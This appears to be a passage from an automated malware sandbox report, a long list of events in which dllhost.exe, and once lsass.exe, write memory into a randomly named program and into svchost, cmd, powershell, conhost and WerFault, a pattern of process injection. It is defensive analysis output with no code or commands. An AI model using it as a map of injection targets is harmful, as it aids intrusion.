Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
